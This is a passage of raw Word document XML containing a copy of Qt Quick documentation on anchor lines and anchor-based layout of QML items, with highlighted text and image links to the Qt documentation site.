          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>anchors</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Each item can be thought of as having a set of </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> invisible "</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>anchor lines</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>":</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2303" w:anchor="anchors.left-prop" w:history="1">
        <w:r w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>left</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2304" w:anchor="anchors.horizontalCenter-prop" w:history="1">
        <w:r w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>horizontalCenter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2305" w:anchor="anchors.right-prop" w:history="1">
        <w:r w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>right</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2306" w:anchor="anchors.top-prop" w:history="1">
        <w:r w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>top</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2307" w:anchor="anchors.verticalCenter-prop" w:history="1">
        <w:r w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>verticalCenter</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2308" w:anchor="anchors.baseline-prop" w:history="1">
        <w:r w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>baseline</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2309" w:anchor="anchors.bottom-prop" w:history="1">
        <w:r w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>bottom</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00251D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49" w:rsidP="00251D49">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/edges_qml.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/edges_qml.png"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"http://doc.qt.io/qt-5/images/edges_qml.png"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"http://doc.qt.io/qt-5/images/edges_qml.png"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"http://doc.qt.io/qt-5/images/edges_qml.png"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"http://doc.qt.io/qt-5/images/edges_qml.png"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"http://doc.qt.io/qt-5/images/edges_qml.png"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"http://doc.qt.io/qt-5/images/edges_qml.png"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"http://doc.qt.io/qt-5/images/edges_qml.png"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"http://doc.qt.io/qt-5/images/edges_qml.png"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"http://doc.qt.io/qt-5/images/edges_qml.png"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"http://doc.qt.io/qt-5/images/edges_qml.png"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"http://doc.qt.io/qt-5/images/edges_qml.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1060" type="#_x0000_t75" alt="" style="width:331.2pt;height:3in">
            <v:imagedata r:id="rId2310" r:href="rId2311"/>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251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00251D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49" w:rsidP="00251D49">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>baseline</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (not pictured above) corresponds to the imaginary line on which text would sit. </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> items with no text it is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>same as</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>top</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00251D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49" w:rsidP="00251D49">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Qt Quick anchoring system allows you to define relationships between the anchor lines of different items. For example, you can write:</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id</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rect1</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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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id</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rect2</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rect1</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right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a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In this case, the left edge of</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rect2</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is bound to the right edge of</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rect1</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, producing the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00251D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49" w:rsidP="00251D49">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/edge1.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/edge1.png"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"http://doc.qt.io/qt-5/images/edge1.png"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"http://doc.qt.io/qt-5/images/edge1.png"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"http://doc.qt.io/qt-5/images/edge1.png"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"http://doc.qt.io/qt-5/images/edge1.png"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"http://doc.qt.io/qt-5/images/edge1.png"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"http://doc.qt.io/qt-5/images/edge1.png"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"http://doc.qt.io/qt-5/images/edge1.png"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"http://doc.qt.io/qt-5/images/edge1.png"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"http://doc.qt.io/qt-5/images/edge1.png"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"http://doc.qt.io/qt-5/images/edge1.png"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"http://doc.qt.io/qt-5/images/edge1.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1061" type="#_x0000_t75" alt="" style="width:158.4pt;height:78.9pt">
            <v:imagedata r:id="rId2312" r:href="rId2313"/>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251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00251D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49" w:rsidP="00251D49">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">You can </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>specify multiple anchors</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. For example:</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id</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rect1</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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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id</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rect2</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rect1</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right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top</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rect1</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bottom</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centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/edge3.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/edge3.png"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"http://doc.qt.io/qt-5/images/edge3.png"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"http://doc.qt.io/qt-5/images/edge3.png"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"http://doc.qt.io/qt-5/images/edge3.png"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"http://doc.qt.io/qt-5/images/edge3.png"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"http://doc.qt.io/qt-5/images/edge3.png"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"http://doc.qt.io/qt-5/images/edge3.png"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"http://doc.qt.io/qt-5/images/edge3.png"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"http://doc.qt.io/qt-5/images/edge3.png"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"http://doc.qt.io/qt-5/images/edge3.png"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"http://doc.qt.io/qt-5/images/edge3.png"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"http://doc.qt.io/qt-5/images/edge3.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1062" type="#_x0000_t75" alt="" style="width:158.4pt;height:158.4pt">
            <v:imagedata r:id="rId2314" r:href="rId2315"/>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251D49">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00251D49" w:rsidRPr="00251D49" w:rsidRDefault="00251D49" w:rsidP="00251D49">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">By specifying multiple horizontal or vertical anchors you can </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>control the size</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of an item. Below,</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rect2</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is anchored to the right of</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rect1</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and the left of</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rect3</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. If either of the blue rectangles are moved,</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rect2</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will stretch and shrink as necessary:</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id</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rect1</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x</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lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</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id</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rect2</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rect1</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right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right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rect3</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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Rectangle</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> id</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:rStyle w:val="pln"/>
